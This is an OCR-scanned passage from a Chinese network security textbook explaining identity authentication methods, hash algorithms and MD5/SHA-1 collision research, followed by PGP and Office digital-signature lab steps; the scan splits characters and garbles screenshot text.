(2) 消息 认证 : 用 于 保证 信息 的 完整 性 和 抗 否认 性 。 在 很 多 情况 下 ， 用 户 要 确认 网 上 
信息 是 不 是 假 的， 信息 是 否 被 第 三 方 修改 或 伪造 ， 这 就 需要 消息 认证 。 


2.3.1 身份 认证 的 重要 性 


相信 不 少 人 会 知道 这 样 一 幅 漫画 : 一 条 狗 在 计算 机 面前 一 边 打 字 ， 一 边 对 另 一 条 狗 说 
“在 互联 网 上 ， 没 有 人 知道 你 是 一 个 人 还 是 一 条 狗 ! ”这 个 漫画 说 明了 在 互联 网 上 很 难 进 
行 身份 识别 。 

身份 认证 是 指 计算 机 及 网 络 系统 确认 操作 者 身份 的 过 程 。 计 算 机 和 计算 机 网 络 组 成 了 
一 个 虚拟 的 数字 世界 。 在 数字 世界 中 ， 一 切 信息 包括 用 户 的 身份 信息 都 是 由 一 组 特定 的 数 
据 表示 ， 计 算 机 只 能 识别 用 户 的 数字 身份 ， 给 用 户 的 授权 也 是 针对 用 户 数字 身份 进行 的 。 
而 我 们 生活 的 现实 世界 是 一 个 真实 的 物理 世界 ， 每 个 人 都 拥有 独一无二 的 物理 身份 。 如 何 
保证 以 数字 身份 进行 操作 的 访问 者 就 是 这 个 数字 身份 的 合法 拥有 者 ， 即 如 何 保证 操作 者 的 
物理 身份 与 数字 身份 相对 应 ， 就 成 为 一 个 重要 的 安全 问题 。 身 份 认证 技术 的 诞生 就 是 为 了 
解决 这 个 问题 。 

如 果 没 有 有 效 的 身份 认证 手段 ， 访 问 者 的 身份 就 很 容易 被 伪造 ， 使 得 未 经 授权 的 人 仿 
冒 有 权限 人 的 身份 ， 这 样 ， 任 何 安全 防范 体系 就 都 形同虚设 ， 所 有 安全 投入 就 被 无 情 地 浪 
费 了 。 


2.3.2 ”身份 认证 的 方式 





“芝麻 ， 芝 麻 ， 开 门 吧 ! ”一 个 咒语 密码 ， 帮 助 阿里 巴巴 打开 了 财富 之 门 。 从 传说 中 
“芝麻 开门 ”的 咒语 ， 到 后 来 的 按 手 印 、 支 票 签 名 ， 再 到 现在 的 安全 密码 认证 、 数 字 签 
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名 、 生 物 识别 ， 身 份 认 证 与 身份 识别 技术 的 发 展 从 来 就 没有 停止 过 。 
目前 ， 计 算 机 及 网 络 系统 中 常用 的 身份 认证 方式 主要 有 以 下 几 种。 
1. 用 户 名 /密码 方式 


用 户 名 /密码 是 最 简单 也 是 最 常用 的 身份 认证 方法 ， 它 是 基于 what you know( 你 知道 什 
么 ) 的 验证 手段 。 每 个 用 户 的 密码 是 由 用 户 设 定 的 ， 只 有 他 自己 才 知 道 ， 因 此 只 要 能 够 正确 
输入 密码 ， 计 算 机 就 认为 他 就 是 这 个 用 户 。 

任何 一 个 用 户 能 够 正确 输入 密码 ， 计 算 机 就 认为 他 是 合法 用 户 ， 但 他 的 网 络 行为 可 信 
吗 ? 我 们 无 从 得 知 。 实 际 上 ， 由 于 许多 用 户 为 了 防止 忘记 密码 ， 经 常 采用 自己 的 生日 、 电 
话 号 码 等 有 意义 的 字符 串 作 为 密码 ， 甚 至 有 人 将 密码 贴 在 自己 的 显示 器 上 方 。 即 使 能 保证 
用 户 密码 不 被 泄露 ， 由 于 密码 是 静态 的 数据 ， 并 且 在 验证 过 程 中 ， 需 要 在 计算 机 内 存 中 和 
网 络 中 传输 ， 而 每 次 验证 过 程 使 用 的 验证 信息 都 是 相同 的 ， 所 以 很 容易 被 驻 留 在 计算 机 内 
存 中 的 木马 程序 或 网 络 中 的 监听 设备 截获 。 因 此 用 户 名 /密码 方式 是 一 种 极 不 安全 的 身份 认 
证 方式 。 

2. IC 卡 认证 


IC 卡 是 一 种 内 置 了 集成 电路 的 卡片 ， 卡 片 中 存 有 与 用 户 身份 相关 的 数据 ， 可 以 认为 是 
不 可 复制 的 硬件 。IC 卡 由 合法 用 户 随身 携带 ， 登 录 时 必须 将 IC 卡 插入 专用 的 读 卡 器 中 读 
取 其 中 的 信息 ， 以 验证 用 户 的 身份 。IC 卡 认 证 是 基于 what you have( 你 拥有 什么 ) 的 手段 ， 
通过 IC 卡 硬件 的 不 可 复制 性 来 保证 用 户 身份 不 会 被 仿冒 。 

然而 由 于 每 次 从 IC 卡 中 读 取 的 数据 还 是 静态 的 ， 通 过 内 存 扫 描 或 网 络 监听 等 技术 
很 容易 截取 到 用 户 的 身份 验证 信息 。 因 此 ，IC 卡 认证 的 方式 还 是 存在 着 根本 的 安全 隐患。 


3. 动态 口令 


信息 系统 中 ， 通 过 一 个 条 件 的 符合 来 证 明 一 个 人 的 身份 称 为 单 因子 认证 。 由 于 仅 使 用 
一 种 条 件 判断 用 户 的 身份 容易 被 仿冒 ， 所 以 可 以 通过 组 合 两 种 不 同 条 件 来 证 明 一 个 人 的 身 
份 ， 称 为 双 因 子 认 证 。 从 认证 信息 来 看 ， 可 以 分 为 静态 认证 和 动态 认证 。 身 份 认证 技术 的 
发 展 ， 经 历 了 从 软件 认证 到 硬件 认证 、 从 单 因 子 认证 到 双 因 子 认证 、 从 静态 认证 到 动态 认 
证 的 过 程 。 

动态 口令 技术 是 一 种 让 用 户 的 密码 按照 时 间或 使 用 次 数 不 断 动态 变化 ， 每 个 密码 只 使 
用 一 次 的 技术 ， 也 称 为 一 次 性 口令 (One-Time Password，OTP) 机 制 。 它 采用 一 种 称 为 动态 
令 牌 的 专用 硬件 ， 密 码 生成 芯片 运行 专门 的 密码 算法 ， 根 据 当前 时 间或 使 用 次 数 生成 当前 
密码 。 用 户 使 用 时 ， 只 需要 将 动态 令 牌 上 显示 的 当前 密码 输入 客户 端 计算 机 ， 即 可 实现 身 
份 的 确认 。 

在 OTP 认证 系统 ， 需 要 拥有 一 些 东西 ( 令 牌 卡 /软件 ) 和 知道 一 些 东西 (个 人 识别 码 ， 
Personal Identification Number，PIN)。 生 成 和 同步 密码 的 方法 随 OTP 系统 的 不 同 而 不 同 。 
在 比较 流行 的 OTP 方法 中 ， 令 牌 卡 在 一 个 时 间 间 隔 内 (通常 为 每 60s) 生 成 登录 密码 
(passcode)。 这 个 看 上 去 随机 的 数字 串 实际 上 与 OTP 服务 器 和 令 牌 上 运行 的 数学 算法 紧密 
相关 。 


/33N. 


"mm@O 计算 机 网 络 安全 教程 


4. 智能 卡 技术 


应 该 说 智能 卡 本 身 就 可 以 算是 一 个 功能 齐全 的 计算 机 ， 它 们 有 自己 的 内 存 、 微 处 理 器 
和 智能 卡 读 取 器 的 串 行 接口 ， 所 有 的 这 些 都 被 包含 在 一 个 信用 卡 大 小 或 是 更 小 的 介质 里 ， 
如 全 球 移动 通信 系统 (Global System for Mobile Communications，GSM) 电 话 的 客户 身份 识 
别 卡 。 

从 安全 的 观点 看 ， 智 能 卡 提供 了 在 卡 里 存储 身份 识别 信息 的 能 力 ， 该 信息 能 够 被 智能 
卡 阅读 器 所 读 取 。 智 能 卡 阅读 器 能 够 连 到 PC 上 验证 VPN 连接 或 访问 另 一 个 网 络 系统 的 用 
户 。 智 能 卡 是 比 PC 本 身 更 为 安全 的 存储 密 钥 的 地 方 ， 因 为 即使 计算 机 完全 被 别人 掌握 ， 
私 钥 不 会 随 之 一 起 被 盗 ， 所 以 这 种 方式 的 身份 验证 对 于 网 络 应 用 系统 来 说 依然 是 可 信 
任 的 。 


5. 生物 特征 认证 


所 谓 生物 识别 ， 可 以 这 样 简单 理解 : 在 门 上 用 钥匙 开门 是 用 你 拥有 的 东西 ， 使 用 密码 
是 用 你 知道 的 东西 ， 而 用 视网膜 等 生物 特征 则 是 用 你 身体 的 一 部 分 。 换 言 之 ， 你 也 许 会 丢 
掉 钥 匙 或 是 忘记 密码 ， 但 用 自己 身体 的 一 部 分 则 没有 这 样 的 顾虑 。 

生物 特征 认证 是 指 采 用 每 个 人 独一无二 的 生物 特征 来 验证 用 户 身 份 的 技术 。 由 于 生物 
特征 本 身 与 传统 的 密码 等 身份 鉴别 相 比 ， 具 有 很 大 的 优点 ， 因 此 得 到 了 广泛 而 深入 的 研究 
和 应 用 。 目 前 常用 来 进行 身份 鉴别 的 生物 特征 有 : 面相、 指纹、 虹膜 、 声 纹 、 步 态 、 签 名 
等 。 从 理论 上 说 ， 生 物 特 征 认 证 是 最 可 靠 的 身份 认证 方式 ， 因 为 它 直接 使 用 人 的 物理 特征 
来 表示 每 一 个 人 的 数字 身份 ， 不 同 的 人 具有 相同 生物 特征 的 可 能 性 可 以 忽略 不 计 ， 因 此 几 
平 不 可 能 被 仿冒 。 

生物 识别 技术 与 电脑 技术 的 紧密 结合 ， 满 足 了 现代 企业 保护 数据 的 安全 和 可 靠 性 管理 
的 需求 ， 特 别 为 企业 管理 人 员 等 对 公司 机 密 接 触 较 多 的 人 员 ， 提 供 了 更 好 的 信息 安全 解决 
方案 。 

6. USB Key 认证 

基于 USB Key 的 身份 认证 方式 是 一 种 方便 、 安 全 、 经 济 的 身份 认证 技术 ， 它 采用 软 硬 
件 相 结合 、 一 次 一 密 的 双 因 子 认 证 模式 ， 很 好 地 解决 了 安全 性 与 易 用 性 之 间 的 矛盾 。 

USB Key 是 一 种 USB 接口 的 硬件 设备 ， 它 内 置 单片机 或 智能 卡 芯片 ， 可 以 存储 用 户 
的 密 钥 或 数字 证 书 ， 利 用 USB Key 内 置 的 密码 学 算法 实现 对 用 户 身份 的 认证 。 基 于 USB 
Key 身份 认证 系统 主要 有 两 种 应 用 模式 : 一 是 基于 冲击 /响应 的 认证 模式 ， 二 是 基于 PKI 体 
系 的 认证 模式 。 


2.3.3 ”消息 认证 一 Hash 算法 


1. Hash 函数 定义 


Hash， 一 般 翻 译 做 “ 散 列 ”， 也 有 的 直接 音译 为 “ 哈 希 ”， 就 是 把 任意 长 度 的 输入 (又 
叫 作 预 映射 ) 通 过 散 列 算法 变换 成 固定 长 度 的 输出 ， 该 输出 就 是 散 列 值 。 这 种 转换 是 一 种 压 
缩 映 射 ， 也 就 是 说 ， 散 列 值 的 空间 通常 远 小 于 输入 的 空间 ， 不 同 的 输入 可 能 会 散 列 成 相同 
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的 输出 ， 而 不 可 能 从 散 列 值 来 唯一 地 确定 输入 值 。 简 单 地 说 ， 就 是 一 种 将 任意 长 度 的 消息 
压缩 到 某 一 固定 长 度 的 消息 摘要 的 函数 。 


2. Hash 算法 


了 解 了 Hash 的 基本 定义 ， 就 不 能 不 提 到 一 些 著名 的 Hash 算法 。 其 中 MD5 和 SHA1 
可 以 说 是 目前 应 用 最 广泛 的 Hash 算法 ， 而 它们 都 是 以 MD4 为 基础 设计 的 。 那 么 它们 都 
是 什么 样 的 算法 呢 ? 

1) MD2 

Rivest 在 1989 年 开发 出 MD2 算法 。 在 这 个 算法 中 ， 首 先 对 信息 进行 数据 补 位 ， 使 信 
息 的 字 节 长 度 是 16 的 倍数 。 然 后 ， 以 一 个 16 位 的 校 验 和 追加 到 信息 末尾 ， 并 且 根 据 这 个 
新 产生 的 信息 计算 出 散 列 值 。 

2) MD4 

为 了 加 强 算 法 的 安全 性 ，Rivest 在 1990 年 又 开发 出 MD4 算法 。MD4 算法 同样 需要 填 
补 信息 以 确保 信息 的 比特 位 长 度 减 去 448 后 能 被 512 整除 (信息 比特 位 长 度 mod 512 = 
448)。 然 后 ， 一 个 以 64 位 二 进 制 表示 的 信息 的 最 初 长 度 被 添加 进来 。 信 息 被 处 理 成 512 位 
迭代 结构 的 区 块 ， 而 且 每 个 区 块 要 通过 3 个 不 同步 又 的 处 理 。Den Boer 和 Bosselaers 以 及 
其 他 人 很 快 发 现 了 攻击 MD4 版 本 中 第 1 步 和 第 3 步 的 漏洞 。Dobbertin 向 大 家 演示 了 如 何 
利用 一 部 普通 的 个 人 计算 机 在 几 分 钟 内 找到 MD4 完整 版 本 中 的 冲突 (这 个 冲突 实际 上 是 一 
种 漏洞 ， 它 将 导致 对 不 同 的 内 容 进 行 加 密 却 可 能 得 到 相同 的 加 密 后 结果 )。 毫 无 疑问 ， 
MD4 就 此 被 淘汰 掉 了 。 

尽管 MD4 算法 在 安全 上 有 个 这 么 大 的 漏洞 ， 但 它 对 在 其 后 才 被 开发 出 来 的 几 种 信息 
安全 加 密 算法 的 出 现 却 有 着 不 可 忽视 的 引导 作用 。 

3) MD5 

1991 年 ，Rivest 开发 出 技术 上 更 为 趋 近 成 熟 的 MD5 算法 。 它 在 MD4 的 基础 上 增加 了 

“安全 -带子 ”(safety-belts) 的 概念 。 虽 然 MD5 比 MD4 复杂 度 大 一 些 ， 但 却 更 为 安全 。 这 
个 算法 很 明显 的 由 4 个 和 MD4 设计 有 少许 不 同 的 步骤 组 成 。 在 MD5 算法 中 ， 信 息 -摘要 
的 大 小 和 填充 的 必要 条 件 与 MD4 完全 相同 。Den Boer 和 Bosselaers 曾 发 现 MDS 算法 中 的 
假 冲突 (pseudo-collisions)， 但 除 此 之 外 就 没有 其 他 被 发 现 的 加 密 后 结果 了 。 

对 MD5 算法 简要 的 叙述 可 以 为 : MD5 以 512 位 分 组 来 处 理 输入 的 信息 ， 且 每 一 分 组 
又 被 划分 为 16 个 32 位 子 分 组 ， 经 过 了 一 系列 的 处 理 后 ， 算 法 的 输出 由 4 个 32 位 分 组 组 
成 ， 将 这 4 个 32 位 分 组 级 联 后 将 生成 一 个 128 位 散 列 值 。 

利用 MDS5 的 算法 原理 ， 可 以 使 用 各 种 计算 机 语言 进行 实现 ， 形 成 各 种 各 样 的 MD5 加 
密 校 验 工具 。 有 很 多 的 在 线 工 具 可 以 实现 这 一 点 ， 这 些 在 线 工具 一 般 是 采用 JavaScript 语 
言 实现 ， 使 用 非常 方便 快捷 。 

利用 MD5 转换 工具 对 字符 进行 加 密 的 工具 ， 如 图 2-8 所 示 。 
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4) SHA-1 

SHA-1 是 由 NIST NSA 设计 为 同 DSA 一 起 使 用 的 ， 它 对 长 度 小 于 264 的 输入 ， 产 生 
长 度 为 160 位 的 散 列 值 ， 因 此 抗 穷 举 (brute-force) 性 更 好 。SHA 1 设计 时 基于 和 MD4 相同 
的 原理 ， 并 且 模仿 了 该 算法 。 


3. Hash 算法 在 信息 安全 方面 的 应 用 体现 


1) 文件 校 验 

人 们 比较 熟悉 的 校 验算 法 有 奇偶 校 验 和 CRC 校 验 ， 这 两 种 校 验 并 没有 抗 数 据 算 改 的 
能 力 。 虽 然 在 一 定 程度 上 它们 能 检测 并 纠正 数据 传输 中 的 信道 误 码 ， 但 却 不 能 防止 对 数据 
的 恶意 破坏 。 

MD5 Hash 算法 的 “数字 指纹 ”特性 ， 使 它 成 为 目前 应 用 最 广泛 的 一 种 文件 完整 性 校 
验 和 (Checksum) 算 法 ， 不 少 UNIX 系统 提供 有 计算 MD5 校 验 和 的 命令 。 

2) 数字 签名 

Hash 算法 是 现代 密码 体系 中 的 一 个 重要 组 成 部 分 。 由 于 非 对 称 算法 的 运算 速度 较 慢 ， 
所 以 在 数字 签名 协议 中 ， 单 向 散 列 函数 扮演 了 一 个 重要 的 角色 。 对 Hash 值 (又 称 数字 摘要 ) 
进行 数字 签名 ， 在 统计 上 可 以 认为 与 对 文件 本 身 进行 数字 签名 是 等 效 的 。 

3) 鉴 权 协议 

鉴 权 协议 又 被 称 作 挑战 -认证 模式 ， 在 传输 信道 可 被 侦 听 但 不 可 被 算 改 的 情况 下 ， 这 
是 一 种 简单 而 安全 的 方法 。 

4. Hash 算法 的 弱点 

2004 年 8 月 17 日 的 美国 加 州 圣 巴巴 拉 的 国际 密码 学 会 议 (Crypto”2004) 上 ， 来 自 中 国 
山东 大 学 的 王小云 教授 做 了 破译 MD5、HAVAL-128、 MD4 和 RIPEMD 算法 的 报告 ， 公 
布 了 MD 系列 算法 的 破解 结果 。 宣 告 了 固 若 金汤 的 世界 通行 密码 标准 MD5 的 堡垒 又 然 倒 
塌 ， 引 发 了 密码 学 界 的 轩然大波 。( 注 意 : 并 非 是 真正 的 破解 ， 只 是 加 速 了 杂凑 冲撞 ) 

令 世 界 顶尖 密码 学 家 想象 不 到 的 是 ， 破 解 MD5 之 后 ，2005 年 2 月 ， 王 小 云 教授 又 破 
解 了 另 一 国际 密码 SHA-1。 因 为 SHA-1 在 美国 等 国际 社会 有 更 加 广泛 的 应 用 ， 密 码 被 破 的 
消息 一 出 ， 在 国际 社会 的 反响 可 谓 石破天惊 。 换 句 话 说， 王小云 的 研究 成 果 表 明了 从 理论 
上 讲 电子 签名 可 以 伪造 ， 必 须 及 时 添加 限制 条 件 ， 或 者 重新 选用 更 为 安全 的 密码 标准 ， 以 
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保证 电子 商务 的 安全 。 


MD5 破解 工程 权威 网 站 是 为 了 公开 征集 专门 针对 MD5 的 攻击 而 设立 的 ， 网 站 于 2004 
年 8 月 17 日 宣布 : “中 国 研究 人 员 发 现 了 完整 MD5 算法 的 碰撞 ; Wang,Feng,Lai 与 Yu 公 
布 了 MD5、MD4、HAVAL-128、RIPEMD-128 几 个 Hash 函数 的 碰撞 。 这 是 近年 来 密码 
学 领域 最 具 实 质 性 的 研究 进展 。 使 用 他 们 的 技术 ， 在 数 个 小 时 内 就 可 以 找到 MD5 碰撞 。 
由 于 这 个 里 程 碑 式 的 发 现 ，MD5CRK 项 目 将 在 随后 48 小 时 内 结束 。” 

在 2004 年 8 月 之 前 ， 国 际 密码 学 界 对 王小云 这 个 名 字 并 不 熟悉 。2004 年 8 月 ， 在 美 
国 加 州 圣 芭 芭 拉 召 开 的 国际 密码 大 会 上 ， 并 没有 被 安排 发 言 的 王小云 教授 拿 着 自己 的 研究 
成 果 找到 会 议 主席 ， 没 想到 慧 眼 识 珠 的 会 议 主席 破例 给 了 她 15 分 钟 时 间 来 介绍 自己 的 成 
果 ， 而 通常 发 言 人 只 被 允许 有 两 三 分 钟 的 时 间 。 王 小 云 与 助手 展示 了 MD5、SHA-0 及 其 
他 相关 杂凑 函数 的 杂凑 冲撞 。 所 谓 杂 凑 冲 撞 指 两 个 完全 不 同 的 信息 经 杂凑 函数 计算 得 出 完 
全 相同 的 杂凑 值 。 根 据 铀 巢 原 理 ， 以 有 长 度 限制 的 杂凑 函数 计算 没有 长 度 限 制 的 信息 是 必 
然 会 有 冲撞 情况 出 现 的 。 可 是 ， 一 直 以 来 ， 计 算 机 保安 专家 都 认为 要 任意 制造 出 冲撞 需 时 
太 长 ， 在 实际 情况 上 不 可 能 发 生 ， 而 王小云 等 的 发 现 可 能 会 打破 这 个 必然 性 。 就 这 样 ， 王 
小 云 在 国际 会 议 上 首次 宣布 了 她 及 她 的 研究 小 组 的 研究 成 果 一 一 对 MD4、MD5、HAVAL- 
128 和 RIPEMD 等 四 个 著名 密码 算法 的 破译 结果 。 

在 公布 到 第 三 个 成 果 的 时 候 ， 会 场 上 已 经 是 掌声 四 起 ， 报 告 不 得 不 一 度 中 断 。 报 告 结 
束 后 ， 所 有 与 会 专家 对 他 们 的 突出 工作 报 以 长 时 间 的 掌声 ， 有 些 学 者 甚至 起 立 鼓掌 以 示 他 
们 的 祝贺 和 敬佩。 由 于 版 本 问题 ， 作 者 在 提交 会 议论 文 时 使 用 的 一 组 常数 和 先行 标准 不 
同 ， 在 发 现 这 一 问题 之 后 ， 王 小 云 教授 立即 改变 了 那个 常数 ， 在 很 短 的 时 间 内 就 完成 了 新 
的 数据 分 析 ， 这 段 有 惊 无 险 的 小 插曲 更 证 明了 他 们 论文 的 信服 力 ， 攻 击 方法 的 有 效 性 ， 验 
证 了 研究 工作 的 成 功 。 

2005 年 8 月 ， 王 小 云 、 姚 期 智 ， 以 及 姚 期 智 妻 子 姚 储 枫 ( 即 为 Knuth 起 名 高 德 纳 的 人 ) 
联手 于 国际 密码 讨论 年 会 尾声 部 分 提出 SHA-1 杂凑 函数 杂凑 冲撞 演算 法 的 改良 版 。 此 改良 
版 使 破解 SHA-1 时 间 缩 短 。 

2006 年 6 月 8 日 ， 王 小 云 教授 于 中 国 科学 院 第 13 次 院士 大 会 和 中 国 工程 院 第 8 次 院 
士 大 会 上 以 “国际 通用 Hash 函数 的 破解 ” 获 颁 陈 嘉 庚 科 学 奖 信息 技术 科学 奖 。 

2009 年 ， 汉 登 国 、 谢 涛 二 人 利用 差分 攻击 ， 将 MD5 的 碰撞 算法 复杂 度 从 王小云 的 
2^42 进一步 降低 到 2^21， 极 端 情况 下 甚至 可 以 降低 至 2^10。 仅 仅 2^21 的 复杂 度 意味 着 即 
便 是 在 2008 年 的 计算 机 上 ， 也 只 要 几 秒 便 可 以 找到 一 对 碰撞 。 


2.4 小 型 案例 实 训 





2.4.1 加 密 应 用 一 -PGP 


加 密 技 术 的 应 用 很 多 ， 包 括 数字 签名 、 数 字 证 书 、 身 份 认证 ， 还 包括 文件 加 密 、 电 子 
邮件 加 密 、 加 密 磁 碟 机 、USB Key 等 。 本 节 主 要 介绍 通过 一 个 加 密 软 件 PGP 加 密 文件 和 
加 密 电 子 邮 件 的 方法 。 

PGP 的 创始 人 是 美国 的 齐 默 尔 曼 (Phil Zimmermann)。 他 的 创造 性 在 于 他 把 RSA 公 匙 
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体系 的 方便 和 传统 加 密 体系 的 高 速度 结合 起 来 ， 并 且 在 数字 签名 和 密 匙 认证 管理 机 制 上 有 
巧妙 的 设计 ， 因 此 PGP 成 为 几乎 最 流行 的 公 钥 加 密 软 件 包 。 

PGP 加 密 系统 是 采用 公开 密 钥 加 密 与 传统 密 钥 加 密 相 结 合 的 一 种 加 密 技术 。 它 使 用 一 
对 数学 上 相关 的 钥匙 ， 其 中 一 个 ( 公 钥 ) 用 来 加 密 信息 ， 另 一 个 ( 私 钥 ) 用 来 解密 信息 。 

PGP 采用 的 传统 加 密 技术 部 分 所 使 用 的 密 钥 称 为 “会 话 密 钥 ”。 每 次 使 用 时 ，PGP 都 
随机 产生 一 个 128 位 的 IDEA 会 话 密 钥 ， 用 来 加 密 报 文 。 公 开 密 钥 加 密 技术 中 的 公 钥 和 私 
钥 则 用 来 加 密会 话 密 钥 ， 并 通过 它 间接 地 保护 报 文 内 容 。 

PGP 最 核心 的 功能 是 : 文件 加 密 、 通 信 加 密 和 数字 签名 ， 以 及 一 些 PGP 辅助 功能 ， 如 
PGP 的 密 钥 管理 机 制 。 


【知识 链接 一 一 PGP】 


PGP(Pretty Good Privacy) 是 一 个 基于 RSA 公 钥 加 密 体系 的 邮件 加 密 软件 。 用 它 可 以 对 
邮件 保密 以 防止 非 授权 者 阅读 ， 它 还 能 为 邮件 加 上 数字 签名 从 而 使 收 信 人 可 以 确认 邮件 的 
发 送 者 ， 并 能 确信 邮件 没有 被 自 改 。 它 可 以 提供 一 种 安全 的 通信 方式 ， 而 事先 并 不 需要 任 
何 保密 的 渠道 用 来 传递 密 匙 。 它 采用 了 一 种 RSA 和 传统 加 密 的 杂 合 算法 ， 用 于 数字 签名 
的 邮件 文摘 算法 ， 加 密 前 压缩 等 ， 还 有 一 个 良好 的 人 机 工程 设计 。 它 的 功能 强大 ， 有 很 快 
的 速度 。 而 且 它 的 源 代 码 是 免费 的 。 


下 面 是 PGP 的 几 个 应 用 。 
1. 创建 并 导出 密 钥 对 


(1) 选择 “开始 ”一 “程序 ”一 PGP 一 PGPkeys 菜单 命令 ， 启 动 PGPkeys， 如 图 2-9 所 示 。 

(2) 选择 Keys 一 New Key 菜单 命令 ， 出 现 Key Generation Wizard 向 导 ， 单 击 “ 下 一 
步 ” 按 钮 ， 开 始 创建 密 钥 对 。 

(3) 输入 全 名 和 邮件 地 址 (每 一 对 密 钥 都 对 应 着 一 个 确定 的 用 户 。 用 户 名 不 一 定 要 真 
实 ， 但 是 要 方便 通信 者 知道 这 个 用 户 名 对 应 的 真实 的 人 ; 邮件 地 址 也 是 一 样 不 需要 真实 ， 
但 是 要 能 方便 与 你 通信 的 人 在 多 个 公 钥 中 快速 地 找 出 你 的 公 钥 )， 如 图 2-10 所 示 。 单 击 
“下 一 步 ” 按 钮 。 


Name and Email 
Every key pai must have a name associsted witht The name and emall adchess lt 
you comespondents know that the public key they are Using belongs to you. 


Elname: isosineqiw 


Eile Bdit View kKeys Server Grous help 


DD 


By assocising an emal adchess wih your key pai', you wil enable PGP to assist your 
Comespondents in selecting the corect public key when commurscating with you 


Emal addess 。 |qiseeingqina163 conl 








(ETE [对 - 














2-9 PGPKeys 了 启动 界面 2-10” 密 钥 生 成 界面 
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(4) 在 要 求 输入 Passphrase 的 对 话 框 中 ， 两 次 输入 Passphrase 并 再 次 确认 ; 这 里 的 
了 Passphrase 可 以 理解 是 保护 自己 私 钥 的 密码 ， 如 图 2-11 所 示 。 
(5) 在 PGP 完成 创建 密 钥 对 后 ， 单 击 “ 下 一 步 ” 按 钮 ， 如 图 2-12 所 示 。 


Passphrase Assignment 
Your private key wil be protected by a passphrase. Itis mportant that you keep this 
passphtase sectet and do not wite down- 





Your passphrase should be a least 8 characters long and should contain 
nor-alphabetic characters. 


Hde Typng 





Passphrase: 


The lit Mim Bers Server gaps Bay 
bh Ba | 














KE-5®]F=S I] (了 k 














图 2-11 输入 用 户口 令 图 2-12 已 经 生成 的 密 钥 


(6) 接着 导出 公 钥 ， 把 公 钥 作为 一 个 文件 保存 在 硬盘 上 ， 并 把 公 钥 文件 作为 邮件 附件 
发 送 给 你 希望 进行 安全 通信 的 联系 人 。 选 择 Keys 一 Export 菜单 命令 ， 如 图 2-13 所 示 。 


2. 文件 的 加 密 与 解密 


有 了 对 方 的 公 钥 之 后 ， 就 可 以 用 对 方 公 钥 对 文件 进行 加 密 ， 然 后 再 传送 给 对 方 。 具 体 
操作 如 下 : 选中 要 加 密 的 文件 并 右 击 ， 在 弹出 的 快捷 菜单 中 选择 PGP 一 Encrypt 命令 ， 如 
图 2-14 所 示 。 

然后 在 密 钥 选择 对 话 框 中 ， 选 择 要 接受 文件 的 接收 者 。 注 意 ， 用 户 所 持 有 的 密 钥 全 部 
列 出 在 对 话 框 的 上 部 分 ， 选 择 要 接收 文件 人 的 公 钥 ， 将 其 公 钥 拖 到 对 话 框 的 下 部 分 
(recipients)， 单 击 OK 按钮 ， 并 且 为 加 密 文件 设置 保存 路 径 和 文件 名 ， 如 图 2-15 所 示 。 


Set as Defanlt Key Ctrlt - 于 压 纺 并 邮寄 
Add ee 丑 压 第 到 “pe 注册 .rer” 并 邮寄 


Reoke. 发 关 到 0D Se 本 
Reverify Signatures acrypt & Sign 


Wipe 


Hew Key, 
Share Split. 


Tnport. 


Baport. 





Properties 


图 2-13” 密 钥 的 导出 图 2-14 加 密 文件 
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此 时 ， 你 就 可 以 把 该 加 密 文件 传送 给 对 方 。 对 方 接收 到 该 加 密 文件 后 ， 选 中 该 文件 并 
右 击 ， 在 弹出 的 快捷 菜单 中 选择 PGP 一 Decrypt&Verify 命令 ， 如 图 2-16 所 示 。 


Ms PePshell - Key Selection Dialog 四 加 


Drag users from this list to the Recipients list [Val... Size 























| Recipients [va 
qiaomingqiu 《qiaomingqiu@l63. com> 





厂 Text Output 

厂 Input Is Text 

"Wipe Original 

厂 Secure Viewer 

厂 conventional Eneryption 
厂 Self Decrypting Archive 








图 2-15 选择 接收 者 图 2-16 文件 解密 


此 时 ， 要 求 输入 私 钥 的 密码 ， 输 入 完 后 ， 单 击 OK 按钮 即 可 。 接 下 来 ， 要 为 已 经 解密 
的 明文 文件 设置 保存 路 径 文件 名 。 保 存 后 ， 明 文 就 可 以 被 直接 查看 了 。 


3. 数字 签名 

由 于 公 钥 是 发 放 给 其 他 人 使 用 的 ， 那 么 在 公 钥 发 放 的 过 程 中 ， 存 在 公 钥 被 人 蔡 换 的 可 
能 。 此 时 ， 若 有 一 个 人 对 此 公 钥 是 否 真正 属于 某 个 用 户 的 公 钥 做 出 证 明 ， 那 么 该 公 钥 的 可 
信任 度 就 比较 高 。 如 果 A 很 熟悉 B， 同 时 能 断定 某 公 钥 是 B 的 且 没 有 人 把 该 公 钥 替换 或 者 
算 改 的 话 ， 那 么 可 以 对 B 的 公 钥 进行 数字 签名 ， 以 自己 的 名 义 保 证 B 的 公 钥 的 真实 性 。 

4. 使 用 PGP 密 钥 对 加 密 邮件 


PGP 可 以 直接 舱 入 客户 端 Outlook 中 使 用 。 在 发 送 之 前 ， 选 中 邮件 所 有 内 容 ， 右 键 单 
击 任务 栏 中 的 PGP Encryption 按钮 ， 即 可 完成 邮件 加 密 。 收 到 邮件 双击 打开 后 ， 单 击 
Decrypt PGP Message 按钮 ， 就 可 解密 邮件 。 


2.4.2 ”数字 证 书 应 用 一 一 Office 市 场 的 签名 服务 


数字 证 书 有 助 于 验证 身份 ， 可 用 于 以 电子 方式 签名 重要 文档 。Microsoft Office 数字 签 
名 结合 了 纸 上 签 名 的 亲切 感 与 数字 格式 的 便利 性 。 下 面 介绍 在 Office 中 如 何 使 用 签名 服务 。 


1. 申请 签名 服务 的 过 程 


(1) 申请 来 自 Office 市 场 的 签名 服务 ， 在 编辑 好 的 Word 文档 中 插入 签名 ， 如 图 2-17 
所 示 。 


.ao 
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和 号 下 人 由 于 不 同 司法 区 域 有 关 证 所 的 法 律 可 能 会 有 所 不 司 ， 因此 , 中 eroseft 不 能 担保 


口 不 月 呈 示 此 少时 @) 














2-17 ”插入 签名 行 


(2) 选择 来 自 Office 市 场 的 签名 服务 ， 在 弹出 的 页 面 中 访问 第 一 家 公司 即 DocuSign 
的 网 站 进行 申请 ， 单 击 Personal 图 标 下 方 的 Sign up 按钮 ， 如 图 2-18 所 示 。 


Welcome to the CoSign Central Trial! 


Choose thetrack that best fits your needs: 


| 芍 、 le 


Personal Business Enterprise 





图 2-18 个 人 证 书 申请 
(3) 填写 个 人 信息 进行 申请 ， 如 图 2-19 所 示 。 


Try the eSignature Standard Now 


hanyuhang1995@163.com 


Industry 
Other 





图 2-19 填写 个 人 信息 


(4) 在 邮箱 中 进行 激活 ， 注 册 成 功 ， 如 图 2-20 所 示 。 

